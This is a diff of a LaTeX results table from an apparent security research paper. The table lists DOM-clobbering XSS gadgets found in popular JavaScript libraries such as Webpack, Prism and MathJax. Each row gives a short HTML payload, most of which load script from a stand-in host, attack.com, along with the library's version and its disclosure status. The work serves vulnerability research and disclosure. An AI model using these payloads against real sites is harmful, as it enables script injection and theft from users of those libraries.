--- a/table-rq1.tex
+++ b/table-rq1.tex
@@ -2,16 +2,16 @@
 \begin{table*}[!t]
 \centering
 \scriptsize
-\caption{A selective list of zero-day gadgets found by \sys in high-profile client-side libraries with over 1,000 stars on GitHub.}
+\caption{[RQ1 \& RQ2] A selective list of zero-day gadgets detected by Hulk but not found or verified by the state-of-the-art approach, \thething, in wildly-used client-side libraries, with over 1,000 stars on GitHub (shown in the "\# of Stars" column). The column "version" indicates the latest affected version. The column \textit{Det.} and \textit{Exp.} are shorthand for the detection of vulnerable flow and exploit generation respectively.}
 \label{table:rq1-zero-day-gadgets}
 \vspace{5pt}
 \setlength{\tabcolsep}{2pt}
-\begin{tabular}{cccccccp{0pt}p{0.43\textwidth}}
+\begin{tabular}{cccccccp{0pt}p{0.45\textwidth}}
 \toprule
  \multirow{2}{*}{\textbf{Library}} &
  \multirow{2}{*}{\textbf{\# of Stars}} &
  \multirow{2}{*}{\textbf{Version}} &
- \multirow{2}{*}{\textbf{Conseq.}} &
+ \multirow{2}{*}{\textbf{Impact}} &
  \multirow{2}{*}{\textbf{Status}} &
  \multicolumn{1}{c}{\textbf{\thething}} &
  \multicolumn{1}{c}{\textbf{\sys}} & &
@@ -19,20 +19,31 @@
  \cmidrule(lr){6-7}
  & & & & & Det./Exp. & Det./Exp. & \\
 \midrule
-Webpack & 64.4K & v5.93.0 & XSS & CVE-2024-43788 & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater </img\textgreater } \\ 
-Prism & 12.2K & v1.29.0 & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com/a.js"\textgreater </img\textgreater } \\ 
-MathJax2 & 10.1K & v2.7.9 & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<a id="MathJax"\textgreater </a\textgreater  <a id="MathJax" name="root" href="https://attack.com"\textgreater </a\textgreater } \\ 
-MathJax3 & 10.1K & v3.2.2 & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater </img\textgreater  \$\$\textbackslash require\{\}tex\}\$\$} \\ 
-rspack & 8.6K & v1.0.0-rc.0 & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater </img\textgreater } \\ 
-Google Closure & 4.9K & v20230103 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com/base.js"\textgreater </img\textgreater } \\ 
-pagefind & 3.3K & v1.1.0 & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="blob:https://attack.com/ui.js"\textgreater </img\textgreater } \\ 
-steal & 1.4K & v2.3.0 & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
-polyfills & 1.1K & v2.8.0 & XSS & N/A & \LEFTcircle &\CIRCLE & &\tightcode{<a id="ShadyDOM"\textgreater </a\textgreater <a id="ShadyDOM" name="force"\textgreater </a\textgreater <a id="WebComponents"\textgreater </a\textgreater <a id="WebComponents" name="root" href="https://attack.com"\textgreater </a\textgreater } \\ 
-doomcaptcha & 1K & latest & XSS & N/A & \LEFTcircle &\CIRCLE & &\tightcode{<img name=currentScript label="<script\textgreater alert(1)</script\textgreater "\textgreater </img\textgreater } \\ 
-AddToAny & N/A & N/A & XSS & N/A & \Circle &\CIRCLE & &\tightcode{<img src="https://addtoany.attack.com name="currentScript"\textgreater } \\ 
-Google Client API & N/A & 5BIk7BglYEE & XSS & Patched & \Circle &\CIRCLE & &\tightcode{<iframe name="scripts" src=”https://apis.google.com/js/api.js”\textgreater </iframe\textgreater <iframe name="scripts" src=”https://apis.google.com/js/api.js”\textgreater alert(1)</iframe\textgreater } \\ 
+Webpack & 64.4K & v5.93.0 & XSS & CVE-2024-43788 & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+Prism & 12.2K & v1.29.0 & XSS & Accepted & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" data-autoloader-path="https://attack.com/a.js"\textgreater } \\ 
+MathJax2 & 10.1K & v2.7.9 & XSS & Accepted & \Circle &\CIRCLE & &\tightcode{<a id="MathJax"\textgreater </a\textgreater  <a id="MathJax" name="root" href="https://attack.com"\textgreater </a\textgreater } \\ 
+MathJax3 & 10.1K & v3.2.2 & XSS & Accepted & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater </img\textgreater  \$\$\textbackslash require\{\}tex\}\$\$} \\ 
+tsup & 8.9K & v8.2.4 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+rspack & 8.6K & v1.0.0-rc.0 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+Google Closure & 4.9K & v20230103 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com/a.js"\textgreater } \\ 
+pagefind & 3.3K & v1.1.0 & XSS & Accepted & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="blob:https://attack.com/a.js"\textgreater } \\ 
+Google Client API & 3.2K & 5BIk7BglYEE & XSS & Patched & \Circle &\CIRCLE & &\tightcode{<iframe name="scripts" src="https://apis.google.com/js/api.js"\textgreater </iframe\textgreater <iframe name="scripts" src="https://apis.google.com/js/api.js"\textgreater alert(1)</iframe\textgreater } \\ 
+Mavo & 2.8K & v0.3.2 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+Stage.js & 2.4K & v1-alpha & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+inspire.js & 1.7K & v1.10 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+steal & 1.4K & v2.3.0 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+polyfills & 1.1K & v2.8.0 & XSS & Reported & \LEFTcircle &\CIRCLE & &\tightcode{<a id="ShadyDOM"\textgreater </a\textgreater <a id="ShadyDOM" name="force"\textgreater </a\textgreater <a id="WebComponents"\textgreater </a\textgreater <a id="WebComponents" name="root" href="https://attack.com"\textgreater </a\textgreater } \\ 
+doomcaptcha & 1K & latest & XSS & Reported & \LEFTcircle &\CIRCLE & &\tightcode{<img name="currentScript" label="<script\textgreater alert(1)</script\textgreater "\textgreater } \\ 
+AddToAny & N/A & N/A & XSS & Patched & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://addtoany.attack.com } \\ 
 
 \bottomrule
 \end{tabular}
-\vspace{5pt}
+\begin{flushleft}
+\vspace{-5pt}
+\scriptsize 
+\Circle\xspace: indicates that the gadget cannot be detected or exploited by the tool.
+\LEFTcircle\xspace: indicates successful detection but failed exploit generation.
+\CIRCLE\xspace: indicates successful detection and verification.
+\end{flushleft}
+\vspace{-15pt}
 \end{table*}
